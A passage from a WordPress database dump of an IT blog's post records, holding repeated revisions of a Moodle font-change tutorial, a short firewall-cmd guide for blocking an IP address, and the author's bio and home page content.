<strong>FontName.css</strong> file in <strong>MOODLE_PATH/theme/[theme_name]/style</strong> directory like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">@font-face {\n font-family: \'IranSans\';\n font-style: normal;\n font-weight: normal;\n font-display: auto;\n\n src: url([[font:theme|font_file.eot]]);\n src: url([[font:theme|font_file.eot]]) format(\'embedded-opentype\'),\n url([[font:theme|font_file.woff]]) format(\'woff\'),\n url([[font:theme|font_file.woff2]]) format(\'woff2\'),\n url([[font:theme|font_file.ttf]]) format(\'truetype\'),\n url([[font:theme|font_file.svg]]) format(\'svg\');\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and finally, purge your cache through<strong> Site Administration > Development > Purge all caches</strong></p>\n<!-- /wp:paragraph -->','Change font in Moodle','','publish','open','open','','change-font-in-moodle','','','2023-08-05 06:03:16','2023-08-05 06:03:16','',0,'https://ictbank.ir/blog/?p=752',0,'post','',0),
(753,2,'2023-07-01 09:36:58','2023-07-01 09:36:58','<!-- wp:paragraph -->\n<p>If you have an academy and using <a href=\"https://moodle.org/\" data-type=\"URL\" data-id=\"https://moodle.org/\">moodle</a> as an LMS is your choice, you may want to change default font of pages to a new one. In this article I am going to talk about a method to do so.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to choose which theme you wanna use (through <strong>Administration > Appearance > Themes > Theme selector</strong>). For example I am gonna use <strong>boost</strong> theme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to copy your font\'s files into theme\'s directory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp FONT_PATH/[font_file].* MOODLE_PATH/theme/[theme_name]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to open theme\'s config.php file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi MOODLE_PATH/theme/[theme_name]/config.php</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and change the value of <strong>$THEME->sheets </strong>parameter:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">$THEME->sheets = [\'FontName\'];</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that you have to create a <strong>FontName.css</strong> file in <strong>MOODLE_PATH/theme/[theme_name]/style</strong> directory like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">@font-face {\n font-family: \'IranSans\';\n font-style: normal;\n font-weight: normal;\n font-display: auto;\n\n src: url([[font:theme|font_file.eot]]);\n src: url([[font:theme|font_file.eot]]) format(\'embedded-opentype\'),\n url([[font:theme|font_file.woff]]) format(\'woff\'),\n url([[font:theme|font_file.woff2]]) format(\'woff2\'),\n url([[font:theme|font_file.ttf]]) format(\'truetype\'),\n url([[font:theme|font_file.svg]]) format(\'svg\');\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and finally, purge your cache through<strong> Site Administration > Development > Purge all caches</strong></p>\n<!-- /wp:paragraph -->','Change font in Moodle','','inherit','closed','closed','','752-revision-v1','','','2023-07-01 09:36:58','2023-07-01 09:36:58','',752,'https://ictbank.ir/blog/?p=753',0,'revision','',0),
(754,2,'2023-07-01 09:42:10','2023-07-01 09:42:10','<!-- wp:paragraph -->\n<p>If you have an academy and using <a href=\"https://moodle.org/\" data-type=\"URL\" data-id=\"https://moodle.org/\">moodle</a> as an LMS is your choice, you may want to change default font of pages to a new one. In this article I am going to talk about a method to do so.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to choose which theme you wanna use (through <strong>Administration > Appearance > Themes > Theme selector</strong>). For example I am gonna use <strong>boost</strong> theme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to copy your font\'s files into theme\'s directory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp FONT_PATH/[font_file].* MOODLE_PATH/theme/[theme_name]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to open theme\'s config.php file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi MOODLE_PATH/theme/[theme_name]/config.php</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and change the value of <strong>$THEME->sheets </strong>parameter:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">$THEME->sheets = [\'FontName\'];</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that you have to create a <strong>FontName.css</strong> file in <strong>MOODLE_PATH/theme/[theme_name]/style</strong> directory like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">@font-face {\n font-family: \'IranSans\';\n font-style: normal;\n font-weight: normal;\n font-display: auto;\n\n src: url([[font:theme|font_file.eot]]);\n src: url([[font:theme|font_file.eot]]) format(\'embedded-opentype\'),\n url([[font:theme|font_file.woff]]) format(\'woff\'),\n url([[font:theme|font_file.woff2]]) format(\'woff2\'),\n url([[font:theme|font_file.ttf]]) format(\'truetype\'),\n url([[font:theme|font_file.svg]]) format(\'svg\');\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and finally, purge your cache through<strong> Site Administration > Development > Purge all caches</strong></p>\n<!-- /wp:paragraph -->','Change font in Moodle','','inherit','closed','closed','','752-revision-v1','','','2023-07-01 09:42:10','2023-07-01 09:42:10','',752,'https://ictbank.ir/blog/?p=754',0,'revision','',0),
(755,2,'2023-07-01 09:42:50','2023-07-01 09:42:50','<!-- wp:paragraph -->\n<p>If you have an academy and using <a href=\"https://moodle.org/\" data-type=\"URL\" data-id=\"https://moodle.org/\">moodle</a> as an LMS is your choice, you may want to change default font of pages to a new one. In this article I am going to talk about a method to do so.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to choose which theme you wanna use (through <strong>Administration > Appearance > Themes > Theme selector</strong>). For example I am gonna use <strong>boost</strong> theme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to copy your font\'s files into theme\'s directory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp FONT_PATH/[font_file].* MOODLE_PATH/theme/[theme_name]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to open theme\'s config.php file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi MOODLE_PATH/theme/[theme_name]/config.php</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and change the value of <strong>$THEME->sheets </strong>parameter:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">$THEME->sheets = [\'FontName\'];</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that you have to create a <strong>FontName.css</strong> file in <strong>MOODLE_PATH/theme/[theme_name]/style</strong> directory like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">@font-face {\n font-family: \'IranSans\';\n font-style: normal;\n font-weight: normal;\n font-display: auto;\n\n src: url([[font:theme|font_file.eot]]);\n src: url([[font:theme|font_file.eot]]) format(\'embedded-opentype\'),\n url([[font:theme|font_file.woff]]) format(\'woff\'),\n url([[font:theme|font_file.woff2]]) format(\'woff2\'),\n url([[font:theme|font_file.ttf]]) format(\'truetype\'),\n url([[font:theme|font_file.svg]]) format(\'svg\');\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and finally, purge your cache through<strong> Site Administration > Development > Purge all caches</strong></p>\n<!-- /wp:paragraph -->','Change font in Moodle','','inherit','closed','closed','','752-revision-v1','','','2023-07-01 09:42:50','2023-07-01 09:42:50','',752,'https://ictbank.ir/blog/?p=755',0,'revision','',0),
(756,2,'2023-07-01 10:37:09','2023-07-01 10:37:09','','moodle','','inherit','open','closed','','moodle','','','2023-07-01 10:37:09','2023-07-01 10:37:09','',752,'http://ictbank.ir/blog/wp-content/uploads/2023/07/moodle.jpg',0,'attachment','image/jpeg',0),
(758,2,'2023-08-05 06:03:16','2023-08-05 06:03:16','<!-- wp:paragraph -->\n<p>If you have an academy and using <a href=\"https://moodle.org/\" data-type=\"URL\" data-id=\"https://moodle.org/\">moodle</a> as an LMS is your choice, you may want to change default font of pages to a new one. In this article I am going to talk about a method to do so.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to choose which theme you wanna use (through <strong>Administration > Appearance > Themes > Theme selector</strong>). For example I am gonna use <strong>boost</strong> theme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to copy your font\'s files into theme\'s directory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp FONT_PATH/[font_file].* MOODLE_PATH/theme/[theme_name]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to open theme\'s config.php file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi MOODLE_PATH/theme/[theme_name]/config.php</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and change the value of <strong>$THEME->sheets </strong>parameter:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">$THEME->sheets = [\'FontName\'];</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that you have to create a <strong>FontName.css</strong> file in <strong>MOODLE_PATH/theme/[theme_name]/style</strong> directory like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">@font-face {\n font-family: \'IranSans\';\n font-style: normal;\n font-weight: normal;\n font-display: auto;\n\n src: url([[font:theme|font_file.eot]]);\n src: url([[font:theme|font_file.eot]]) format(\'embedded-opentype\'),\n url([[font:theme|font_file.woff]]) format(\'woff\'),\n url([[font:theme|font_file.woff2]]) format(\'woff2\'),\n url([[font:theme|font_file.ttf]]) format(\'truetype\'),\n url([[font:theme|font_file.svg]]) format(\'svg\');\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and finally, purge your cache through<strong> Site Administration > Development > Purge all caches</strong></p>\n<!-- /wp:paragraph -->','Change font in Moodle','','inherit','closed','closed','','752-revision-v1','','','2023-08-05 06:03:16','2023-08-05 06:03:16','',752,'https://ictbank.ir/blog/?p=758',0,'revision','',0),
(760,2,'2023-08-29 12:14:51','2023-08-29 12:14:51','<!-- wp:paragraph -->\n<p>Sometimes you need to block an IP address (or a range of IP addresses) from accessing your machine. In this case firewall-cmd can help you through these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">firewall-cmd --permanent --add-rich-rule=\"rule family=\'ipv4\' source address=\'xxx.xxx.xxx.xxx/xx\' drop\"\nfirewall-cmd --reload\nfirewall-cmd --list-all</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally, if you decide to remove this rule, you can use these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">firewall-cmd --permanent --remove-rich-rule=\"rule family=\'ipv4\' source address=\'xxx.xxx.xxx.xxx/xx\' drop\"\nfirewall-cmd --reload\nfirewall-cmd --list-all</pre>\n<!-- /wp:syntaxhighlighter/code -->','Block an IP address in firewall-cmd','','publish','open','open','','block-an-ip-address-in-firewall-cmd','','','2023-11-01 06:17:52','2023-11-01 06:17:52','',0,'https://ictbank.ir/blog/?p=760',0,'post','',0),
(761,2,'2023-08-29 12:14:51','2023-08-29 12:14:51','<!-- wp:paragraph -->\n<p>Sometimes you need to block an IP address (or a range of IP addresses) from accessing your machine. In this case firewall-cmd can help you through these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">firewall-cmd --permanent --add-rich-rule=\"rule family=\'ipv4\' source address=\'xxx.xxx.xxx.xxx/xx\' drop\"\nfirewall-cmd --reload\nfirewall-cmd --list-all</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally, if you decide to remove this rule, you can use these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">firewall-cmd --permanent --remove-rich-rule=\"rule family=\'ipv4\' source address=\'xxx.xxx.xxx.xxx/xx\' drop\"\nfirewall-cmd --reload\nfirewall-cmd --list-all</pre>\n<!-- /wp:syntaxhighlighter/code -->','Block an IP address in firewall-cmd','','inherit','closed','closed','','760-revision-v1','','','2023-08-29 12:14:51','2023-08-29 12:14:51','',760,'https://ictbank.ir/blog/?p=761',0,'revision','',0),
(764,2,'2023-10-02 10:09:38','2023-10-02 10:09:38','<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2023-10-02 10:09:38','2023-10-02 10:09:38','',51,'https://ictbank.ir/blog/?p=764',0,'revision','',0),
(765,2,'2023-10-02 10:10:20','2023-10-02 10:10:20','<!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2023-10-02 10:10:20','2023-10-02 10:10:20','',51,'https://ictbank.ir/blog/?p=765',0,'revision','',0),
(768,2,'2023-11-01 06:17:44','2023-11-01 06:17:44','','what-is-a-firewall','','inherit','open','closed','','what-is-a-firewall','','','2023-11-01 06:17:44','2023-11-01 06:17:44','',760,'http://ictbank.ir/blog/wp-content/uploads/2023/08/what-is-a-firewall.jpg',0,'attachment','image/jpeg',0),
(775,2,'2024-04-11 15:14:24','2024-04-11 15:14:24','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-11 15:14:24','2024-04-11 15:14:24','',647,'https://ictbank.ir/blog/?p=775',0,'revision','',0),
(776,2,'2024-04-11 15:14:24','2024-04-11 15:14:24','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-11 15:14:24','2024-04-11 15:14:24','',647,'https://ictbank.ir/blog/?p=776',0,'revision','',0),
(777,2,'2024-04-11 15:14:25','2024-04-11 15:14:25','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-11 15:14:25','2024-04-11 15:14:25','',647,'https://ictbank.ir/blog/?p=777',0,'revision','',0),
(779,2,'2024-04-13 05:52:51','2024-04-13 05:52:51','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2024-04-13 05:52:51','2024-04-13 05:52:51','',345,'https://ictbank.ir/blog/?p=779',0,'revision','',0),
(780,2,'2024-04-13 05:53:15','2024-04-13 05:53:15','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2024-04-13 05:53:15','2024-04-13 05:53:15','',345,'https://ictbank.ir/blog/?p=780',0,'revision','',0),
(782,2,'2024-04-13 05:57:14','2024-04-13 05:57:14','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-13 05:57:14','2024-04-13 05:57:14','',647,'https://ictbank.ir/blog/?p=782',0,'revision','',0),
(783,2,'2024-04-13 05:57:15','2024-04-13 05:57:15','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-13 05:57:15','2024-04-13 05:57:15','',647,'https://ictbank.ir/blog/?p=783',0,'revision','',0),
(784,2,'2024-04-13 05:57:15','2024-04-13 05:57:15','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2024-04-13 05:57:15','2024-04-13 05:57:15','',647,'https://ictbank.ir/blog/?p=784',0,'revision','',0),
(785,2,'2024-04-13 05:57:52','2024-04-13 05:57:52','','header','','inherit','closed','closed','','715-revision-v1','','','2024-04-13 05:57:52','2024-04-13 05:57:52','',715,'https://ictbank.ir/blog/?p=785',0,'revision','',0),
(786,2,'2024-04-13 06:30:48','2024-04-13 06:30:48','','logo','','inherit','open','closed','','logo','','','2024-04-13 06:30:48','2024-04-13 06:30:48','',345,'http://ictbank.ir/blog/wp-content/uploads/2021/05/logo.png',0,'attachment','image/png',0),
(787,2,'2024-04-13 06:31:07','2024-04-13 06:31:07','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2024-04-13 06:31:07','2024-04-13 06:31:07','',345,'https://ictbank.ir/blog/?p=787',0,'revision','',0),
(788,2,'2024-04-13 06:34:23','2024-04-13 06:34:23','','header','','inherit','closed','closed','','715-revision-v1','','','2024-04-13 06:34:23','2024-04-13 06:34:23','',715,'https://ictbank.ir/blog/?p=788',0,'revision','',0),
(790,2,'2024-04-13 06:37:14','2024-04-13 06:37:14','','header','','inherit','closed','closed','','715-revision-v1','','','2024-04-13 06:37:14','2024-04-13 06:37:14','',715,'https://ictbank.ir/blog/?p=790',0,'revision','',0),
(791,2,'2024-04-14 10:41:44','2024-04-14 10:41:44','','HIXQ6420','','inherit','open','closed','','hixq6420','','','2024-04-14 10:41:44','2024-04-14 10:41:44','',51,'http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420.jpg',0,'attachment','image/jpeg',0),
